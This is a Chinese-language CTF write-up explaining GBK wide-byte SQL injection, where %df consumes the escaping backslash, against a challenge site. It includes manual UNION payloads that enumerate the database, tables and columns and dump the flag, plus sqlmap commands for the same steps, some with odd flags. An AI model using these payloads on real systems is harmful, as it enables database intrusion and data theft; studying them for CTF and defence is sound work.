GBK注射
宽字节注入
**
在使用PHP连接MySQL的时候,当设置“set
character_set_client = gbk”时会导致一个编码转换的问题,也就是我们熟悉的宽字节注入,当存在宽字节注入的时候,注入参数里带入% DF%27,即可把(%5C)吃掉,举个例子。
**
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1当提交
id=1' and 1=1%23时,MySQL的运行的SQL语句为
select * from user where id ='1\' and 1=1#'很明显这是没有注入成功的,而当我们提交
id=1%df' and 1=1%23MySQL的运行的SQL语句为
select * from user where id ='1運' and 1=1#'我们这里的宽字节注入是利用的MySQL的一个特性,MySQL的在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围)。这就是MySQL的的特性,因为GBK是多字节编码,他认为两个字节代表一个汉字,所以%DF和后面的\也就是%5c中变成了一个汉字“运”,而“逃逸了出来。
我用了手工注入和SqlMap的工具注入,先讲一下手工注入吧
1.手工注入
接着上面的,我们继续进行注入
id=%df%27%20union%20select%201,%20database()%23
爆出数据库之后,我们继续进行注入,爆出表
id=%df%27 union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()%23
接下来我们就一个试一下每一个表,在这里我就省略了哈,直接给你们看一下爆出ctf4中表的内容的过程
下面是我第一次爆表的语句
id=%df%27 union select 1,group_concat(column_name)from information_schema.columns where table_name=ctf4%23**没想到报错了,想了很长时间,难道还是过滤字符\搞得鬼?试着把字符转换成十六进制?ctf4转16进制为0x63746634,转换网址
将ctf4转换之后再进行注入**
id=%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746634%23
爆出了两列,下面在获取flag的内容
id=%df%27 union select 1,group_concat(flag) from ctf4%23
不出错这个应该就是了吧
2.工具注入
**注入工具我直接放过程状语从句:查询查询结果了啊
爆出当前数据库**
sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' --current-db
爆出此数据库下的所有表
sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover --tables
爆出ctf4下面的所有列
sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover -T ctf4 --columns
爆出旗中的内容
sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover -T ctf4 -C flag --dump
获取成功哈